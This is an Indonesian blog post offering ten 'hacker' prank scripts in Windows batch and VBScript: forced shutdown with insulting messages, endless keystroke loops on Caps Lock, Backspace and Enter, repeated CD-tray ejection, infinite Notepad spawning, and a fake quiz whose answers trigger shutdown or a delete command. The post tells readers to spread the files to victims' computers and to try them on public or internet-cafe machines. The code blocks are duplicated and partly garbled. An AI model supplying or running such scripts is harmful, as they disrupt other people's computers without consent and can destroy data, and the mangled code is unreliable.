Hallloooo sobat-sobatku. . . Langsung
aja ya. . . kali ini aku mau posting tentang tips dan trik para hacker
menjaili teman2nya. . Berikut ini tip dan triknya. . .
TRIK 1 - Membuat Forced Shoutdown
————————————————-
@echo off
msg * I don’t like you
shutdown -c “Error! You are too ******!” -s
————————————————-
msg * I don’t like you
shutdown -c “Error! You are too ******!” -s
————————————————-
Copy dan Simpan Kode berwarna merah di atas ke Notepad dengan nama : xhack.bat (Type File : All Files). Sebarkan file tersebut ke komputer/ Laptop teman Anda. Maka Komputer/ Laptop korban akan Otomatis Forced Shutdown
TRIK 2 – Membuat Tombol Caps Lock menyala terus-menerus
——————————————————————
——————————————————————
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
——————————————————-
Seperti cara yang pertama hanya berbeda kode script. Simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File. Sebarkan File tersebut ke Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus selama file tidak dihapus (bila dimatikan akan menyala lagi)
TRIK 3 – Membuat Pesan Jail mucul terus
——————————————————
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
————————————————————————————————————
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File. Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul. Kata-kata yang miring bisa diganti dengan selera Anda.
TRIK 4 – Jail dengan Membuka Tutup CD/DVD room
——————————————————
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
——————————————————-
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File. maka DVD/CD romnya akan membuka dan menutup otomatis.
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File. maka DVD/CD romnya akan membuka dan menutup otomatis.
TRIK 5 – Membuat script mucul terus menerus
——————————————————-
——————————————————-
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
——————————————————-
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File. Membuat script bermunculan terus menerus.
TRIK 6 – Membuat Tombol Backspace menjadi error (menekan terus menerus)simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File. Membuat script bermunculan terus menerus.
——————————————————–
MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
———————————————————-
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File. maka Tombol Backspace akan eror dan menekan dengan sendirinya.
TRIK 7 – Cara Membuat Pesan ‘ Komputer Anda Jelek Banget ‘ di Notepad/ Wordpadsimpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File. maka Tombol Backspace akan eror dan menekan dengan sendirinya.
———————————————————–
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Komputer Anda Jelek Banget“
loop
do
wscript.sleep 100
wshshell.sendkeys “Komputer Anda Jelek Banget“
loop
———————————————————–
Ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs
TRIK 8 – Cara Membuat Notepad Terbuka Otomatis (terus menerus)Ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs
————————————————————
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
————————————————————
simpan di Notepad dengan nama : xhack.BAT. maka Notepad akan terbuka terus menerus
TRIK 9 – Membuat Notepad dengan Pesan Jailsimpan di Notepad dengan nama : xhack.BAT. maka Notepad akan terbuka terus menerus
————————————————————-
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka“
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je“
WScript.Sleep 50
WshShell.SendKeys “le“
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se“
WScript.Sleep 50
WshShell.SendKeys “ka“
WScript.Sleep 50
WshShell.SendKeys “li“
WScript.Sleep 50
WshShell.SendKeys “ y“
WScript.Sleep 50
WshShell.SendKeys “a“
WScript.Sleep 50
WshShell.SendKeys “ h“
WScript.Sleep 50
WshShell.SendKeys “!“
WScript.Sleep 50
WshShell.SendKeys “!! “
———————————————————–
simpan di Notepad dengan nama : xhack.vbs . ganti kode yang bercetak miring sesuai dengan selera anda.
TRIK 10 – Cara Membuat Memilih jawaban seperti Quiz di Notepad
———————————————————–
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
———————————————————–
simpan kode script berikut di Notepad dengan nama : xhack.BAT
simpan kode script berikut di Notepad dengan nama : xhack.BAT
#jangan dibuat untuk mainan. . . kalo mau nyoba, silahkan di komputer umum atau di warnet!!!
0 comments:
Post a Comment